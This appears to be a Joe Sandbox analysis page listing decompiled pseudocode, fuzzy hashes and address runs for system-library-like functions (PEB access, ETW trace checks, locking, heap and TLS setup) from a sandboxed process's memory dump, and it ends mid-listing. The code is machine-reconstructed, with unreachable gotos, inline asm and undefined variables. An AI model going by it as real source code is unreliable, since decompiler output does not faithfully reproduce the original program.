0x1f02228a
0x1f02228c
0x1f022295
0x1f022295
0x1f02229e
0x00000000
0x00000000
0x1f0222a4
0x1f0222a4
0x1f0222a7
0x1f0222a9
0x1f0222ac
0x1f0222ac
0x1f0222af
0x1f0222b2
0x1f0222b9
0x1f0222be
0x1f0222c3
0x1f0222cc
0x1f0222d1
0x1f0222d8
0x00000000
0x1f0222d8
0x1f0222ce
0x1f0222d0
0x1f0222d0
0x00000000
0x1f0222d0
0x1f0222c5
0x00000000
0x1efc8cbf
0x1efc8cbf
0x1efc8cc3
0x1efc8cc3
0x1efc8cb9

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
Instruction ID: 5a4dff5167599a2b69615830da059d1e05bdf64ba56f65b0f5e182cf0e69f12a
Opcode Fuzzy Hash: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
Instruction Fuzzy Hash: 74216732602AD2ABF319C7A4C824B65B7D8EF40764F5A06A4DD019B7D1E36AFC44C270

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD3AF6 Relevance: .1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1EFD3AF6(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				signed int _t24;
				intOrPtr* _t26;
				char* _t27;
				intOrPtr* _t32;
				char* _t33;
				signed char _t43;
				signed char _t44;
				signed char _t52;
				void* _t56;
				intOrPtr* _t57;

				_t56 = __edx;
				_t57 = __ecx;
				if(( *(__edx + 0x10) & 0x0000ffff) == 0) {
					L14:
					_t52 = 0;
				} else {
					_t52 = 1;
					if(( *0x1f0b6638 & 0x00000004) == 0) {
						_t24 =  *(__ecx + 0x5c) & 0x0000ffff;
						if(_t24 > 0x70 ||  *((intOrPtr*)(__ecx + 0x50)) < ( *(0x1ef9b518 + _t24 * 2) & 0x0000ffff) << 4) {
							goto L2;
						} else {
							asm("sbb bl, bl");
							_t44 = _t43 & 1;
							goto L3;
						}
						goto L10;
					} else {
						L2:
						_t44 = 0;
					}
					L3:
					_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t26 != 0) {
						if( *_t26 == 0) {
							goto L4;
						} else {
							_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							goto L5;
						}
						L23:
					} else {
						L4:
						_t27 = 0x7ffe038a;
					}
					L5:
					if( *_t27 != 0) {
						L21:
						if(_t44 != 0) {
							E1F07F38A(_t44,  *((intOrPtr*)( *((intOrPtr*)( *_t57 + 0xc)) + 0xc)),  *((intOrPtr*)(_t56 + 4)),  *(_t57 + 0x5c) & 0x0000ffff);
							_t52 = 1;
							goto L9;
						}
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
						if(_t32 != 0) {
							if( *_t32 == 0) {
								goto L7;
							} else {
								_t33 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								goto L8;
							}
							goto L23;
						} else {
							L7:
							_t33 = 0x7ffe0380;
						}
						L8:
						if( *_t33 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
								goto L9;
							} else {
								goto L21;
							}
						} else {
							L9:
							if(_t44 != 0) {
								goto L14;
							}
						}
					}
				}
				L10:
				return _t52;
				goto L23;
			}

0x1efd3afb
0x1efd3afd
0x1efd3b09
0x1efd3b81
0x1efd3b81
0x1efd3b0b
0x1efd3b0d
0x1efd3b15
0x1efd3b61
0x1efd3b68
0x00000000
0x1efd3b7c
0x1f01903c
0x1f01903e
0x00000000
0x1f01903e
0x00000000
0x1efd3b17
0x1efd3b17
0x1efd3b17
0x1efd3b17
0x1efd3b19
0x1efd3b1f
0x1efd3b24
0x1f019048
0x00000000
0x1f01904e
0x1f019057
0x00000000
0x1f019057
0x00000000
0x1efd3b2a
0x1efd3b2a
0x1efd3b2a
0x1efd3b2a
0x1efd3b2f
0x1efd3b32
0x1f019090
0x1f019092
0x1f0190a8
0x1f0190af
0x00000000
0x1f0190af
0x1efd3b38
0x1efd3b3e
0x1efd3b43
0x1f019064
0x00000000
0x1f01906a
0x1f019073
0x00000000
0x1f019073
0x00000000
0x1efd3b49
0x1efd3b49
0x1efd3b49
0x1efd3b49
0x1efd3b4e
0x1efd3b51
0x1f01908a
0x00000000
0x00000000
0x00000000
0x00000000
0x1efd3b57
0x1efd3b57
0x1efd3b59
0x00000000
0x00000000
0x1efd3b59
0x1efd3b51
0x1efd3b32
0x1efd3b5d
0x1efd3b60
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f48883f205d06197ba1a72e42e3682e5899cb562fe5575d41939cfa8269a5e22
Instruction ID: c0d27d3f2f407334f5f068bc98729660f0131f7b55d2eb99e37f2dc70b808216
Opcode Fuzzy Hash: f48883f205d06197ba1a72e42e3682e5899cb562fe5575d41939cfa8269a5e22
Instruction Fuzzy Hash: 3221F43A306B91CFD316CB2AC8B0B617BE5FB41714F084696ED868B651D779EC89C720

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD1BE7 Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1EFD1BE7(intOrPtr __ecx) {
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				signed int _t22;
				intOrPtr* _t26;
				intOrPtr* _t27;
				signed int _t37;
				signed int _t40;
				intOrPtr _t41;
				signed int _t47;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;

				_t53 = __ecx;
				_v12 = __ecx;
				_t2 = _t53 + 0x20; // 0x20
				E1EFEDB40(_t2, 1, 0);
				_t3 = _t53 + 0x8c; // 0x8c
				_t47 =  *_t3;
				_t52 = 2;
				do {
					_t40 = _t47;
					_t37 = _t47 & 0x00000001;
					_t22 = _t40;
					asm("lock cmpxchg [esi], edx");
					_t47 = _t22;
				} while (_t47 != _t40);
				_t55 = _v12;
				if(_t37 != 0) {
					asm("lock xadd [esi], edi");
					_t41 =  *[fs:0x18];
					 *((intOrPtr*)(_t55 + 0x50)) =  *((intOrPtr*)(_t41 + 0x19c));
					 *((intOrPtr*)(_t55 + 0x54)) =  *((intOrPtr*)(_t41 + 0x1a0));
					_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t26 != 0) {
						if( *_t26 == 0) {
							goto L4;
						} else {
							_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							goto L5;
						}
						L12:
					} else {
						L4:
						_t27 = 0x7ffe0386;
					}
					L5:
					if( *_t27 != 0) {
						_t16 = _t55 + 0x78; // 0x7b
						E1F094BE0( *((intOrPtr*)(_t55 + 0x5c)), _t16,  *((intOrPtr*)(_t55 + 0x30)),  *((intOrPtr*)(_t55 + 0x34)),  *((intOrPtr*)(_t55 + 0x3c)));
					}
					_t11 = _t55 + 0x78; // 0x7b
					_push(0);
					_push( *((intOrPtr*)(_t55 + 0x74)));
					_t22 = E1EFD1C8F(_t37, _t11,  *((intOrPtr*)(_t55 + 0x5c)), _t52) | 0xffffffff;
					asm("lock xadd [esi], eax");
					if(_t22 == 0) {
						 *0x1f0b91e0(_t55);
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 4))))))();
					}
				}
				return _t22;
				goto L12;
			}

0x1efd1bf1
0x1efd1bf9
0x1efd1bfc
0x1efd1bff
0x1efd1c04
0x1efd1c0a
0x1efd1c10
0x1efd1c11
0x1efd1c11
0x1efd1c18
0x1efd1c1d
0x1efd1c1f
0x1efd1c23
0x1efd1c25
0x1efd1c29
0x1efd1c2e
0x1efd1c30
0x1efd1c34
0x1efd1c41
0x1efd1c4a
0x1efd1c53
0x1efd1c58
0x1f025ad2
0x00000000
0x1f025ad8
0x1f025ae1
0x00000000
0x1f025ae1
0x00000000
0x1efd1c5e
0x1efd1c5e
0x1efd1c5e
0x1efd1c5e
0x1efd1c63
0x1efd1c67
0x1f025af1
0x1f025afa
0x1f025afa
0x1efd1c70
0x1efd1c73
0x1efd1c75
0x1efd1c7d
0x1efd1c80
0x1efd1c84
0x1f025b0c
0x00000000
0x1f025b12
0x1efd1c84
0x1efd1c8e
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee3a1dcaa1dff1873ea1ed3faf3008f86575cb9953798872d9b5d1ee38b3a84
Instruction ID: f1dfbf1e07279328cffa0beb2965a59d83f6ea3ff1a35e7658fe0f10142b5be8
Opcode Fuzzy Hash: 9ee3a1dcaa1dff1873ea1ed3faf3008f86575cb9953798872d9b5d1ee38b3a84
Instruction Fuzzy Hash: 5321D636701B508FD712CF28C890B96F7E5FF88714F184669D996876A0E771BC05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1F03FE1F Relevance: .1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1F03FE1F(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E1EFD3C40();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1f0b5d78; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = E1EFD5D90(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E1F0088C0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E1EFD3C40() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E1F002F90();
						_t23 = E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x1f03fe1f
0x1f03fe24
0x1f03fe25
0x1f03fe28
0x1f03fe2a
0x1f03fe2e
0x1f03fe31
0x1f03fe36
0x1f03fe3d
0x1f03fe4f
0x1f03fe3f
0x1f03fe48
0x1f03fe48
0x1f03fe54
0x1f03fe5d
0x1f03fe62
0x1f03fe75
0x1f03fe7a
0x1f03fe7e
0x1f03fe88
0x1f03fe8e
0x1f03fe94
0x1f03fe9b
0x1f03fea5
0x1f03fea9
0x1f03febb
0x1f03fec7
0x1f03fed2
0x1f03fed2
0x1f03fed8
0x1f03fedc
0x1f03fee0
0x1f03fee5
0x1f03fee6
0x1f03fef7
0x1f03fef7
0x1f03fe7e
0x1f03ff00

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a84f17d59444d438795d0b7d8c8fb287d1c75ede5db13b14cc9493f148f6c064
Instruction ID: df597e78d55f9ea8c9bcbe43ac39121b0e182182b1f9022df74d2a837ab5a9ff
Opcode Fuzzy Hash: a84f17d59444d438795d0b7d8c8fb287d1c75ede5db13b14cc9493f148f6c064
Instruction Fuzzy Hash: B521BA75A00650AFD715CB68C880F6AB7F8FF88745F14016AF944DB691E738EE40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 1F001ED8 Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1F001ED8(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				void* _t55;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				signed int _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				signed int _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					__eflags =  *((intOrPtr*)(_t72 + 0xc)) - _t57;
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L11:
						_t72 =  *_t72;
						continue;
					}
					_t18 = _t72 + 0x10; // 0x10
					_t55 = E1F018050(_t18, _t65, _t57);
					__eflags = _t55 - _t57;
					if(_t55 != _t57) {
						_t65 = _v8;
						goto L11;
					}
					return 0xb7;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E1EFF457E(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = E1EFD5D90(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E1F0088C0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E1EFCDE20(_t62, __eflags, _t71, 1, 6,  &_v36);
					__eflags = _t63;
					if(_t63 == 0) {
						L24:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					__eflags = _t45 - _t58;
					if(_t45 < _t58) {
						goto L24;
					}
					_t69 = _t45 / _t58;
					__eflags = _t69;
					if(_t69 == 0) {
						L23:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						__eflags =  *((intOrPtr*)(_t63 + 0xc)) - 2;
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L22;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						__eflags =  *_t49 - 0x53445352;
						if( *_t49 != 0x53445352) {
							goto L22;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						__eflags = 0;
						return 0;
						L22:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
						__eflags = _t74 - _t69;
					} while (_t74 < _t69);
					goto L23;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x1f001ed8
0x1f001ee1
0x1f001ee4
0x1f001ee8
0x1f001eeb
0x1f001eeb
0x1f001ef1
0x1f001ef4
0x1f001ef6
0x1f001f60
0x1f001f63
0x1f001f7e
0x1f001f7e
0x00000000
0x1f001f7e
0x1f001f67
0x1f001f6b
0x1f001f70
0x1f001f72
0x1f001f7b
0x00000000
0x1f001f7b
0x00000000
0x1f001f74
0x1f001efd
0x1f001eff
0x1f001f02
0x1f001f0a
0x00000000
0x1f039f7e
0x1f001f23
0x1f001f27
0x1f001f87
0x00000000
0x1f001f87
0x1f001f2d
0x1f001f30
0x1f001f34
0x1f001f39
0x1f001f41
0x1f001f8c
0x1f001f8d
0x1f001f94
0x1f001f95
0x1f001f96
0x1f001f97
0x1f001f9b
0x1f001fa2
0x1f001fa5
0x1f001fad
0x1f001faf
0x1f001fb1
0x1f001fff
0x1f002001
0x00000000
0x1f002001
0x1f001fb3
0x1f001fb8
0x1f001fb9
0x1f001fbb
0x00000000
0x00000000
0x1f001fc1
0x1f001fc3
0x1f001fc5
0x1f001ff8
0x00000000
0x1f001ff8
0x1f001fc7
0x1f001fca
0x1f001fca
0x1f001fce
0x00000000
0x00000000
0x1f001fd3
0x1f001fd5
0x1f001fd7
0x1f001fdd
0x00000000
0x00000000
0x1f001fe5
0x1f001fe7
0x00000000
0x1f001ff0
0x1f001ff0
0x1f001ff3
0x1f001ff4
0x1f001ff4
0x00000000
0x1f001fca
0x1f001f43
0x1f001f45
0x1f001f48
0x1f001f4e
0x1f001f50
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74cbd90cfa31ed074255a04d368f7a226c0228ce273c1010bb8c9dbd0041e93
Instruction ID: 7de704354752dc62e3ea1c59fc216bf9f5f704226fab9113becaceae2a74ca70
Opcode Fuzzy Hash: c74cbd90cfa31ed074255a04d368f7a226c0228ce273c1010bb8c9dbd0041e93
Instruction Fuzzy Hash: C2219275A04709EFE721EF68C540A5ABBF9EF44394F14887BE949AB250D374ED048F90

Uniqueness

Uniqueness Score: -1.00%

Function 1F03FF03 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E1F03FF03(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E1EFD3C40() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E1EFD3C40() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1ef95dfc;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E1EFE40F0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E1EFE40F0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E1F040227(_a8, 0, 0, 0,  &_v36,  &_v28);
									E1EFD3B90( &_v52);
								}
								_t21 = E1EFD3B90( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x1f03ff0e
0x1f03ff13
0x1f03ff15
0x1f03ff19
0x1f03ff1d
0x1f03ff21
0x1f03ff2c
0x1f03ff3e
0x1f03ff2e
0x1f03ff37
0x1f03ff37
0x1f03ff46
0x1f03ff4c
0x1f03ff59
0x1f03ff62
0x1f03ff74
0x1f03ff64
0x1f03ff6d
0x1f03ff6d
0x1f03ff7c
0x1f03ff7e
0x1f03ff80
0x1f03ff82
0x1f03ff82
0x1f03ff87
0x1f03ff8c
0x1f03ff8d
0x1f03ff92
0x1f03ff95
0x1f03ff9b
0x1f03ff9c
0x1f03ffa3
0x1f03ffa7
0x1f03ffba
0x1f03ffc4
0x1f03ffc4
0x1f03ffce
0x1f03ffce
0x1f03ffa3
0x1f03ff7c
0x1f03ff59
0x1f03ffd9

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1127fa164e8e07987b1a1e5ff968260784be123d476678f40cbdb10c449f7b1f
Instruction ID: 6b2e44e8ac4d3f9749b0eaeaacbdb0ba7927f6864d0c3b8cbed6113c327cb678
Opcode Fuzzy Hash: 1127fa164e8e07987b1a1e5ff968260784be123d476678f40cbdb10c449f7b1f
Instruction Fuzzy Hash: 5821D372A043859FD301DF65C844F9BBBECEF82645F05096ABD9087151E734E90AC6A2

Uniqueness

Uniqueness Score: -1.00%

Function 1F066D79 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1F066D79(void* __eflags) {
				char _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v44;
				signed int _t31;
				signed int _t32;
				intOrPtr _t37;
				signed int _t41;
				signed int _t50;
				intOrPtr _t53;
				intOrPtr _t55;

				_t53 =  *[fs:0x30];
				_v32 = _t53;
				E1EFCFED0(0x1f0b4800);
				E1F0901EA(0x1f0b6dc8, 1,  &_v20);
				_t50 = 0;
				_t41 = 0;
				if( *((intOrPtr*)(_t53 + 0x88)) <= 0) {
					L9:
					return _t50;
				} else {
					goto L1;
				}
				do {
					L1:
					_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x90)) + _t41 * 4));
					if( *((intOrPtr*)(_t55 + 8)) != 0xddeeddee) {
						__eflags =  *(_t55 + 0x40) & 0x00000001;
						if(( *(_t55 + 0x40) & 0x00000001) != 0) {
							goto L15;
						}
						_t14 =  &_v24;
						 *_t14 = _v24 | 0xffffffff;
						__eflags =  *_t14;
						_v36 = _t50;
						_v28 = 0xfffc2f70;
						while(1) {
							_t31 = E1EFF0990(__eflags,  *((intOrPtr*)(_t55 + 0xc8)));
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_push( &_v28);
							_push(_t50);
							E1F002CF0();
							_t37 = _v44 + 1;
							_v44 = _t37;
							__eflags = _t37 - 0x64;
							if(__eflags < 0) {
								continue;
							}
							__eflags = 0;
							_t50 = 0xc0000194;
							E1F0699D6(0, _t41);
							goto L9;
						}
						__eflags =  *((char*)(_t55 + 0xea)) - 2;
						if( *((char*)(_t55 + 0xea)) != 2) {
							_t32 = _t50;
						} else {
							_t32 =  *(_t55 + 0xe4);
						}
						__eflags = _t32;
						if(_t32 != 0) {
							L1EFD2330(_t32, _t32);
						}
					} else {
						if(( *(_t55 + 0xc) & 0x00000001) == 0) {
							E1F0894B4(_t55);
						}
					}
					L15:
					_t53 = _v32;
					_t41 = _t41 + 1;
				} while (_t41 <  *((intOrPtr*)(_t53 + 0x88)));
				goto L9;
			}

0x1f066d86
0x1f066d93
0x1f066d97
0x1f066da9
0x1f066dae
0x1f066db0
0x1f066db8
0x1f066e28
0x1f066e30
0x00000000
0x00000000
0x00000000
0x1f066dba
0x1f066dba
0x1f066dc0
0x1f066dca
0x1f066ddb
0x1f066ddf
0x00000000
0x00000000
0x1f066de1
0x1f066de1
0x1f066de1
0x1f066de6
0x1f066dea
0x1f066df2
0x1f066df8
0x1f066dfd
0x1f066dff
0x00000000
0x00000000
0x1f066e05
0x1f066e06
0x1f066e07
0x1f066e10
0x1f066e11
0x1f066e15
0x1f066e18
0x00000000
0x00000000
0x1f066e1c
0x1f066e1e
0x1f066e23
0x00000000
0x1f066e23
0x1f066e31
0x1f066e38
0x1f066e42
0x1f066e3a
0x1f066e3a
0x1f066e3a
0x1f066e44
0x1f066e46
0x1f066e49
0x1f066e49
0x1f066dcc
0x1f066dd0
0x1f066dd4
0x1f066dd4
0x1f066dd0
0x1f066e4e
0x1f066e4e
0x1f066e52
0x1f066e53
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e06ae5361b333807f06a0bf6cc72003450530326d41083f30ad22e1b5bc006e3
Instruction ID: 8e43dc8e0e8f622929358ba83792a6989f148de8a5bff8e25d5f03bc2ec5d0c1
Opcode Fuzzy Hash: e06ae5361b333807f06a0bf6cc72003450530326d41083f30ad22e1b5bc006e3
Instruction Fuzzy Hash: 3F21B3B5A047819BD310DE39CD50B5FB7DAEFC5324F044A2DF8AA9B241DB30B9498791

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEBE80 Relevance: .1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E1EFEBE80(signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _t34;
				intOrPtr* _t40;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				signed int _t58;
				signed int _t61;
				signed int _t64;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr _t67;

				_t58 = __edx;
				_t34 = _a4;
				_t65 =  *[fs:0x18];
				if(_t34 == 0 || _t34 >= 0xff0) {
					return 0xc000000d;
				}
				_t51 =  *((intOrPtr*)(_t65 + 0xfb4));
				_t61 = _t34 + 0x10;
				if(_t51 != 0) {
					L3:
					asm("bsr edx, edi");
					_t67 =  *((intOrPtr*)(_t51 + _t58 * 4 - 8));
					asm("btc edi, edx");
					if(_t67 == 0) {
						L12();
						_t67 = _t34;
						if(_t67 != 0) {
							goto L4;
						}
						L17:
						return 0xc0000017;
					}
					L4:
					 *((intOrPtr*)(_t67 + 4 + _t61 * 4)) = _a8;
					return 0;
				}
				_t51 = E1EFD5D90(_t53,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x28);
				if(_t51 == 0) {
					goto L17;
				}
				 *_t51 = 0;
				 *((intOrPtr*)(_t51 + 4)) = 0;
				 *((intOrPtr*)(_t51 + 8)) = 0;
				 *((intOrPtr*)(_t51 + 0xc)) = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((intOrPtr*)(_t51 + 0x14)) = 0;
				 *((intOrPtr*)(_t51 + 0x18)) = 0;
				 *((intOrPtr*)(_t51 + 0x1c)) = 0;
				 *((intOrPtr*)(_t51 + 0x20)) = 0;
				 *((intOrPtr*)(_t51 + 0x24)) = 0;
				 *((intOrPtr*)(_t65 + 0xfb4)) = _t51;
				L1EFD2330(_t37, 0x1f0b66d0);
				_t40 =  *0x1f0b66f8; // 0x3352248
				if( *_t40 == 0x1f0b66f4) {
					 *_t51 = 0x1f0b66f4;
					 *((intOrPtr*)(_t51 + 4)) = _t40;
					 *_t40 = _t51;
					 *0x1f0b66f8 = _t51;
					_t34 = E1EFD24D0(0x1f0b66d0);
					goto L3;
				}
				asm("int 0x29");
				_push(3);
				_push(_t51);
				_push(_t65);
				_push(_t61);
				_t52 = _t58;
				_v24 = 3;
				_t64 = 1 << _t52 + 4;
				_t66 = E1EFD5D90(_t52 + 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 8);
				if(_t66 != 0) {
					 *_t66 = 0;
					 *((intOrPtr*)(_t66 + 4)) = 0;
					if(1 != 0) {
						_t30 = _t66 + 4; // 0x4
						E1F008F40(_t30, 0, _t64 << 2);
					}
					 *((intOrPtr*)(_v12 + _t52 * 4)) = _t66;
				}
				return _t66;
			}

0x1efebe80
0x1efebe85
0x1efebe8a
0x1efebe94
0x00000000
